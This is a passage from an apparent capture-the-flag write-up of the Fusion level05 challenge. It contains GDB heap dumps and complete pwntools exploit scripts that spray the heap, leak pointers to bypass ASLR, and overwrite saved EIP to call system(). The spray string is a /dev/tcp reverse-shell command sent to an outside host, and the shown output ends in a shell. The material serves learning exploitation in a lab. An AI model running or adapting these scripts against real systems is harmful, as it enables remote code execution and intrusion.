gef➤ p childtask $1 = {void (void *)} 0xb78d9c70 <childtask> gef➤ search-pattern 0xb78d9c70 [+] Searching '\x70\x9c\x8d\xb7' in memory [+] In (0xb76ed000-0xb772f000), permission=rw- 0xb772d130 - 0xb772d140 → "\x70\x9c\x8d\xb7[...]" [+] In '[heap]'(0xb8c14000-0xb8c35000), permission=rw- 0xb8c1c6ec - 0xb8c1c6fc → "\x70\x9c\x8d\xb7[...]" 0xb8c1c840 - 0xb8c1c850 → "\x70\x9c\x8d\xb7[...]" 0xb8c247c8 - 0xb8c247d8 → "\x70\x9c\x8d\xb7[...]" gef➤ heap chunks Chunk(addr=0xb8c14008, size=0x108, flags=PREV_INUSE) [0xb8c14008 08 d0 6e b7 10 41 c1 b8 b0 c4 c1 b8 a0 4e c2 b8 ..n..A.......N..] Chunk(addr=0xb8c14110, size=0x83a0, flags=PREV_INUSE) [0xb8c14110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb8c1c4b0, size=0x83a0, flags=PREV_INUSE) [0xb8c1c4b0 98 4e c2 b8 30 84 8a b7 00 00 00 00 00 00 00 00 .N..0...........] Chunk(addr=0xb8c24850, size=0x10, flags=) [0xb8c24850 04 00 00 00 60 48 c2 b8 00 00 00 00 01 02 00 00 ....`H..........] Chunk(addr=0xb8c24860, size=0x200, flags=PREV_INUSE) [0xb8c24860 41 42 43 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 ABC./bin/sh > /d] ... gef➤ p/d 0xb8c24850 - 0xb8c247c8 $2 = 136 gef➤ p/d 136 / 4 $3 = 34 gef➤ dereference 0xb8c247c8 34 0xb8c247c8│+0x0000: 0xb78d9c70 → <childtask+0> push ebp 0xb8c247cc│+0x0004: 0xb8c1c72c → 0x00000000 0xb8c247d0│+0x0008: 0xb78e160c → 0x00000000 0xb8c247d4│+0x000c: 0xb776c629 → <swapcontext+89> pop ebx 0xb8c247d8│+0x0010: 0x00000002 0xb8c247dc│+0x0014: 0xb78dc349 → <taskswitch+41> test eax, eax 0xb8c247e0│+0x0018: 0xb8c1c6c0 → 0x00000000 0xb8c247e4│+0x001c: 0xb78e15a0 → 0x00000000 0xb8c247e8│+0x0020: 0x00000000 0xb8c247ec│+0x0024: 0x00000000 0xb8c247f0│+0x0028: 0x00000000 0xb8c247f4│+0x002c: 0x00000000 0xb8c247f8│+0x0030: 0xb78dc380 → <taskstart+0> sub esp, 0x1c 0xb8c247fc│+0x0034: 0xb776c5ab → <makecontext+75> lea esp, [esp+ebx*4] 0xb8c24800│+0x0038: 0x00000000 0xb8c24804│+0x003c: 0x00000000 ...
You can see there are a couple of other function addresses in here; there’s no particular reason to use childtask() over the others.
Next, I’ll need the offset from the childtask() function to the write@got.plt entry. I’ll first ask GDB to print the address of write() in libc and search memory for that value. The hit inside the level05 mapping is the .got.plt slot that stores it. Then we just subtract the address of childtask() from the address of that slot to find the offset. We can use this offset because the heap contains a pointer to childtask(), and that pointer is always at the same location (near the beginning of the heap):
gef➤ p write $1 = {<text variable, no debug info>} 0xb76382c0 <write> gef➤ search-pattern 0xb76382c0 [+] Searching '\xc0\x82\x63\xb7' in memory [+] In '/opt/fusion/bin/level05'(0xb7726000-0xb7727000), permission=rw- 0xb77261a8 - 0xb77261b8 → "\xc0\x82\x63\xb7[...]" gef➤ p childtask $2 = {void (void *)} 0xb7721c70 <childtask> gef➤ p 0xb77261a8 - 0xb7721c70 $3 = 0x4538
This offset value will be the same each time the program is loaded into memory.
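A quick way to convince yourself of that is to check the offset against two different runs. The address pairs below are taken from the GDB session above and from the script output further down; the helper name is mine.

```python
GOT_WRITE_MINUS_CHILDTASK = 0x4538   # offset measured in GDB above


def write_got_entry(childtask_addr: int) -> int:
    """Address of the write@got.plt slot, given a leaked childtask() address."""
    return childtask_addr + GOT_WRITE_MINUS_CHILDTASK


# (childtask address, write@got.plt address) from two separate runs
runs = [
    (0xB7721C70, 0xB77261A8),
    (0xB7876C70, 0xB787B1A8),
]

for childtask, got_slot in runs:
    print(hex(write_got_entry(childtask)), write_got_entry(childtask) == got_slot)
```

Both runs agree because childtask() and the .got.plt section belong to the same binary, which is relocated as a single unit.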
In summary, we’ll need to:
- Find the childtask() pointer stored in the heap
- Find the write() function address stored in the .got.plt section
- Calculate the address of system()
Here’s the script I wrote to find the childtask()
pointer in the heap and display the required addresses.
#!/usr/bin/env python3
from pwn import *
import time
import sys

##################
FD = 0xb97001b0  # Use the address found from leaking the file descriptor
##################

bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
content = b"checkname "
content += b"A" * 32
align = 0x860
#context.log_level = 'DEBUG'

def send(read_ptr):
    # Overwrite saved ESI with the fd address and the next slot with the address to read
    payload = content
    payload += p32(FD)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)

def bad(addr):
    # True if the packed address contains a byte we cannot send
    return any(ch in p32(addr) for ch in bad_chars)

if bad(FD):
    log.error("File descriptor address contains a bad byte.")

io = remote("fusion", 20005)
log.info(io.recvline())

read = ((FD - align - 1) & 0xfffff000) + align

# Keep track of when the previous address contained a bad byte
prev_bad = False

log.info("Searching...")
while read > 0xb7000000:
    if bad(read):
        #log.failure(f"Bad byte found in address {read:#010x}")
        prev_bad = True
        read -= 0x1000
        continue

    time.sleep(0.005)
    data = send(read)
    if not data:
        log.error("No data received. Either the program crashed or you have a bad file descriptor address.")
    elif data[:3] == b"ABC":
        prev_inuse = send(read - 24)
        if prev_inuse[:2] == b"\xa0\x83":
            # childtask() ptr offset from start of user-supplied heap = -136 bytes
            childtask_str = send(read - 136)
            childtask = unpack(childtask_str[:4])
            write_str = send(childtask + 0x4538)
            write_addr = unpack(write_str[:4])
            log.info(f"Last address read: {read-136:#010x}")
            log.success(f"Found address to childtask(): {childtask:#010x}")
            log.success(f"   The write@got.plt address: {(childtask+0x4538):#010x}")
            log.success(f"   The address to write() is: {write_addr:#010x}")
            log.success(f"  The address to system() is: {(write_addr-0x847a0):#010x}")
            break
    elif data == b" is not indexed already\n" and prev_bad:
        log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                    "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it.\n"
                    "It is recommended to crash the program so you can start over.")
        log.warning("NOTE: You will need to spray the heap again")
        crash = input("Crash the program? [Y/n] ")
        if crash.lower() == "n":
            log.failure("Exiting")
            sys.exit(1)
        else:
            log.warning("OK, crashing the program")
            io.sendline(content + b"A"*12)
            sys.exit(1)
    elif data == b" is not indexed already\n" and not prev_bad:
        log.failure("We've hit a null region. Something went wrong.")
        log.info(f"Last address read: {read+0x1000:#010x}")
        sys.exit(1)

    read -= 0x1000
    prev_bad = False
This went through a lot of trial-and-error and there’s probably a better way of doing it than this. But it works.
andrew ~/level05 $ ./find_system.py
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[*] Searching…
[*] Last address read: 0xb876f7d8
[+] Found address to childtask(): 0xb7876c70
[+] The write@got.plt address: 0xb787b1a8
[+] The address to write() is: 0xb778d2c0
[+] The address to system() is: 0xb7708b20
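The bad-byte check in the scripts is worth a closer look, since any address we send has to survive the trip into get_and_hash(). Here is a standalone sketch of the same idea using only the standard library. A null byte ends the string and '@' (0x40) is the separator passed to get_and_hash(); my assumption is that LF and CR are excluded because the server handles input line by line.

```python
import struct

BAD_BYTES = b"\x00\x0a\x0d\x40"   # NUL, LF, CR, '@'


def has_bad_byte(addr: int) -> bool:
    """True if the little-endian encoding of addr contains a byte we cannot send."""
    packed = struct.pack("<I", addr)
    return any(b in BAD_BYTES for b in packed)


print(has_bad_byte(0xB7708B20))   # system() address from the run above
print(has_bad_byte(0xB7700A20))   # contains 0x0a
print(has_bad_byte(0xB7404142))   # contains 0x40 ('@')
```

If a needed address fails this check, the only fix is a fresh process with a different memory layout, which is why the scripts offer to crash the program.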
Getting A Reverse Shell
Now that we have the address of the system() function, we can use the buffer overflow in the get_and_hash() function to take control of the program and execute our reverse shell string. It's as simple as overwriting the saved EIP on the stack with the address of system(), following it with a 4-byte placeholder where system() expects its own return address, and then supplying the address of our reverse shell string as the argument.
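To make the stack layout concrete, here is a minimal sketch of how that payload is laid out, written with the standard struct module instead of pwntools so it runs anywhere. The helper names are hypothetical, the two addresses are example values from one run, and the 44 bytes of padding match the script in this post.

```python
import struct

BAD_BYTES = b"\x00\x0a\x0d\x40"  # bytes the scripts in this post avoid


def has_bad_byte(addr):
    """True if the little-endian form of addr contains a bad byte."""
    return any(b in BAD_BYTES for b in struct.pack("<I", addr))


def build_payload(system, ret, arg, pad=44):
    """checkname + padding + [saved EIP -> system] + [fake return] + [argument]."""
    for value in (system, ret, arg):
        if has_bad_byte(value):
            raise ValueError(f"{value:#010x} contains a bad byte")
    return b"checkname " + b"A" * pad + struct.pack("<III", system, ret, arg)


# Example values only; ASLR changes them on every restart of the service.
SYSTEM = 0xb7750b20
STRING = 0xb87c9864
payload = build_payload(SYSTEM, 0x41414141, STRING)
print(len(payload), payload[-12:].hex())
```

The middle word is where system() will return to when the shell exits, which is why any non-bad value works for getting the shell itself.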
#!/usr/bin/env python3
from pwn import *
import sys

bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']

def bad(addr):
    # True if the packed address contains one of the bad bytes
    return any(char in p32(addr) for char in bad_chars)

###################
SYSTEM = 0xb7750b20
STRING = 0xb87c9864
###################

# Connect first so the crash option below has a socket to send on
io = remote("fusion", 20005)
log.info(io.recvline())

if bad(SYSTEM):
    log.failure("The system() address contains a bad byte. "
                "It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    crash = input("Crash the program? [Y/n] ")
    if crash.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        io.sendline(b"checkname " + b"A" * 44)
        sys.exit(1)

content = b"checkname "
content += b"A" * 44
content += p32(SYSTEM)  # overwrites the saved EIP
content += b"A" * 4     # return address for system(), not needed here
content += p32(STRING)  # argument to system(): our reverse shell string

l = listen(1337)
io.sendline(content)
l.wait_for_connection()
l.interactive()
andrew ~/level05 $ ./rshell.py
[+] Opening connection to fusion on port 20005: Done
[*] ** welcome to level05 **
[+] Trying to bind to :: on port 1337: Done
[+] Waiting for connections on :::1337: Got connection from ::ffff:10.0.1.5 on port 55669
[*] Switching to interactive mode
$ id
uid=20005 gid=20005 groups=20005
$
Conclusion
Wow, this was a long one. I did my best to explain everything as much as possible. Of course, some prerequisite knowledge is still required. But if you, dear reader, feel like I did a poor job at explaining something, leave a comment. It is my goal here to provide the best write-up possible.
Here’s a quick TLDR on what we did:
- Spray the heap with a reverse shell string
  - We need enough copies to ensure we can start guessing at addresses and hit our data
  - This is only possible because the program does not properly free heap-allocated space
- Use the BOF vulnerability in the get_and_hash() function to find a valid file descriptor address in our data
  - Using the checkname command will call this function
  - We'll know we've hit a valid file descriptor (4) when we get a response from the server
- This gives us an information leak that allows us to read data from the heap
  - The address pointing to the string returned to the client is right after the file descriptor on the stack
  - We keep stepping back and reading data from the heap all the way to the beginning
  - There are pointers to several functions in the level05 binary near the beginning of the heap
  - Leaking one of those addresses (childtask() is used here) allows us to defeat ASLR
- Read the address of a libc function from the .got.plt section
  - The function used here is write(), and its .got.plt entry is at a constant offset from childtask()
- Calculate the system() function address, as it is at a constant offset from write()
- Utilize the BOF vulnerability to overwrite the saved EIP register with the address of system()
  - The next 4 bytes after that can be anything; however, it's recommended to use the address of exit()
    - This prevents the program from causing a segfault when you quit the reverse shell
  - The last 4 bytes are the address of our reverse shell string as an argument to system()
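The "stepping back" part of the list above boils down to walking down the heap one page at a time and skipping any address that cannot be sent. Here is a minimal sketch of just that address generation, with no network I/O. The function names are hypothetical, and the 0x860 alignment, 0x1000 step and 0xb7000000 floor are the values used in the scripts in this post.

```python
import struct

BAD_BYTES = b"\x00\x0a\x0d\x40"  # bytes the scripts in this post avoid


def has_bad_byte(addr):
    """True if the little-endian form of addr contains a bad byte."""
    return any(b in BAD_BYTES for b in struct.pack("<I", addr))


def scan_addresses(fd_addr, align=0x860, floor=0xb7000000, step=0x1000):
    """Yield candidate read addresses below fd_addr, highest first.

    Each address sits at offset `align` inside its page; addresses whose
    packed form contains a bad byte are skipped instead of being sent.
    """
    read = ((fd_addr - align - 1) & 0xfffff000) + align
    while read > floor:
        if not has_bad_byte(read):
            yield read
        read -= step


# Example file descriptor address taken from the script earlier in this post.
addrs = list(scan_addresses(0xb97001b0))
print(f"first: {addrs[0]:#010x}, last: {addrs[-1]:#010x}, total: {len(addrs)}")
```

The real scripts additionally remember whether the previous address was skipped, so they can tell a genuine null region apart from one that might hide an unreadable pointer.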
One last thing to do is to put this all together into a single exploit script.
#!/usr/bin/env python3
from pwn import *
import time
import sys

def connect():
    io = remote("fusion", 20005)
    log.info(io.recvline())
    return io

### HEAP SPRAY #################################################################
def spray(io):
    buff_sz = 504
    command = b"isup "
    content = b"ABC "
    content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes
    content += b"A" * (buff_sz - len(content))
    content += pack(4)
    max_spray = 60222

    with log.progress('Spraying') as p:
        for i in range(max_spray):
            io.send(command + content)
            p.status(f"{(i/max_spray):.2%}")
            time.sleep(0.005)

    io.close()
    print()

### LEAK FILE DESCRIPTOR #######################################################
CHECKNAME = b"checkname "
CHECKNAME += b"A" * 32

def leak_fd(io):
    print()
    start_addr = 0xb9700108
    log.info("Searching for a valid file descriptor...")
    for fd in range(start_addr, start_addr+528, 16):
        io.sendline(CHECKNAME + p32(fd))
        data = io.recvline(timeout=0.1)
        if b"indexed already" in data:
            log.success(f"File descriptor address: {fd:#010x}")
            string = fd + 28
            log.success(f"Reverse shell string at: {string:#010x}")
            break
    else:
        log.error("File descriptor address not found!")

    return fd, string

### FIND SYSTEM() ADDRESS ######################################################
def send(io, fd, read_ptr):
    payload = CHECKNAME
    payload += p32(fd)
    payload += p32(read_ptr)
    io.sendline(payload)
    return io.recvline(timeout=0.1)

def crash(io):
    log.failure("It is recommended to crash the program so you can start over.")
    log.warning("NOTE: You will need to spray the heap again")
    resp = input("Crash the program? [Y/n] ")
    if resp.lower() == "n":
        log.failure("Exiting")
        sys.exit(1)
    else:
        log.warning("OK, crashing the program")
        io.sendline(CHECKNAME + b"A"*12)
        sys.exit(1)

def bad(addr):
    bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40']
    if any(bad in p32(addr) for bad in bad_chars):
        return True
    return False

def find_system(io, fd):
    print()
    # Keep track of when the previous address contained a bad byte
    prev_bad = False
    align = 0x860
    read = ((fd - align - 1) & 0xfffff000) + align

    log.info("Searching for system()...")
    while read > 0xb7000000:
        if bad(read):
            #log.failure(f"Bad byte found in address {read:#010x}")
            prev_bad = True
            read -= 0x1000
            continue

        time.sleep(0.005)
        data = send(io, fd, read)
        if not data:
            log.error("No data received. Either the program crashed or you have a bad file descriptor address.")
        elif data[:3] == b"ABC":
            prev_inuse = send(io, fd, read - 24)
            if prev_inuse[:2] == b"\xa0\x83":
                # childtask() ptr offset from start of user-supplied heap = -136 bytes
                childtask_str = send(io, fd, read - 136)
                childtask = unpack(childtask_str[:4])
                write_str = send(io, fd, childtask + 0x4538)
                write_addr = unpack(write_str[:4])
                system = write_addr - 0x847a0
                log.success(f"Address to childtask() stored at: {read-136:#010x}")
                log.success(f" Address to childtask(): {childtask:#010x}")
                log.success(f" The write@got.plt address: {childtask+0x4538:#010x}")
                log.success(f" The address to write() is: {write_addr:#010x}")
                log.success(f" The address to system() is: {system:#010x}")
                break
        elif data == b" is not indexed already\n" and prev_bad:
            log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n"
                        "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it.")
            crash(io)
        elif data == b" is not indexed already\n" and not prev_bad:
            log.failure("We've hit a null region. Something went wrong.")
            log.info(f"Last address read: {read+0x1000:#010x}")
            sys.exit(1)

        read -= 0x1000
        prev_bad = False
    else:
        log.error("Something went wrong. Unable to find pointer to childtask() in the heap.")

    return system

### GET REVERSE SHELL ##########################################################
def rshell(io, system, string):
    print()
    if bad(system):
        log.failure("The system() address contains a bad byte")
        crash(io)

    EXIT = system - 0xa140
    payload = CHECKNAME
    payload += b"A" * 12
    payload += p32(system)
    payload += p32(EXIT)
    payload += p32(string)

    l = listen(1337)
    io.sendline(payload)
    l.wait_for_connection()
    l.interactive()

if __name__ == "__main__":
    io = connect()
    spray(io)
    io = connect()
    fd, string = leak_fd(io)
    system = find_system(io, fd)
    rshell(io, system, string)
> The comma operator in the for loop says to keep looping while i is less than maxsz OR while string[i] exists.
Although it doesn't matter for the exploitation, I just wanted to correct this. The comma operator returns only the value of the last expression, so it will keep looping while string[i] exists, completely ignoring maxsz.
https://stackoverflow.com/questions/52550/what-does-the-comma-operator-do
other than that great article
Looking back on this with what I know now, you’re absolutely right. I’ll fix that.
Hey good solution! One question.
How come you don't overwrite the location on the heap that stores the address of isup when performing your spray?
Wouldn't your "garbage" data overwrite the contents of that location, so that later reading the location containing the address of isup would return your garbage data instead?
best regards.
Love this breakdown. I'll have to read this again. I really want to get to this level of pwn because it's genuinely my favourite. What path do you recommend for learning how to read ASM?
Personally, I read Assembly Language for X86 Processors, which is an excellent book. But there’s a LOT of resources out there.